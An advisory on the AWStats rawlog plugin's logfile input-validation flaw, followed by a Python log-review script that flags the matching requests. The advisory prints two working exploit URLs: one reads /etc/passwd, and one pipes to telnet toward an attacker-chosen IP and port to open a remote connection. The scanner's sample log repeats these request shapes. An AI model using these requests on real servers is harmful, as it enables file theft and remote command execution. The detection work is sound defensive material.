AWStats Rawlog Plugin Logfile Parameter Input Validation Vulnerability

No exploit is required. The following example requests are available:

http://www.example.com/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=www.example.com&framename=main&pluginmode=rawlog&logfile=/etc/passwd
http://www.example.com/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=www.example.com&framename=main&pluginmode=rawlog&logfile=&logfile=|telnet <your ip> <port>

The '&config' parameter value is the configuration file for www.example.com. It is reported that the configuration filename can be harvested from the HTML source of the AWStats page for the target site.
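A log-review check for the two request shapes above, as an added example that is not part of the original advisory: it flags awstats.pl requests in rawlog plugin mode that supply a non-empty logfile value, including the case where an empty logfile= precedes a second one. The common/combined log format, the sample log lines, and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request target inside a common/combined log format entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(target):
    """Return a finding string for a rawlog request that sets logfile, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith("awstats.pl"):
        return None
    # keep_blank_values: an empty first logfile= must not hide a later one.
    params = parse_qs(parts.query, keep_blank_values=True)
    if "rawlog" not in params.get("pluginmode", []):
        return None
    values = [v.strip() for v in params.get("logfile", []) if v.strip()]
    if not values:
        return None
    if any(v.startswith("|") or v.endswith("|") for v in values):
        return "logfile value contains a pipe"
    return "logfile set from the query string"

def scan(lines):
    """Return (line_number, finding) for every flagged log line."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        finding = classify(match.group(1)) if match else None
        if finding:
            findings.append((number, finding))
    return findings

# Constructed sample log lines (documentation addresses, placeholder command).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /awstats.pl?config=www.example.com HTTP/1.1" 200 5120',
    '192.0.2.11 - - [01/Jan/2010:10:00:05 +0000] "GET /awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=www.example.com&framename=main&pluginmode=rawlog&logfile= HTTP/1.1" 200 900',
    '192.0.2.12 - - [01/Jan/2010:10:00:09 +0000] "GET /awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=www.example.com&framename=main&pluginmode=rawlog&logfile=/etc/passwd HTTP/1.1" 200 1843',
    '192.0.2.12 - - [01/Jan/2010:10:00:14 +0000] "GET /awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=www.example.com&framename=main&pluginmode=rawlog&logfile=&logfile=%7Cplaceholder-command HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for number, finding in scan(SAMPLE_LOG):
        print(f"line {number}: {finding}")
```

The values are URL-decoded before inspection, so an encoded pipe (%7C) in the log is matched the same way as a literal one.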


 

Copyright 2010, SecurityFocus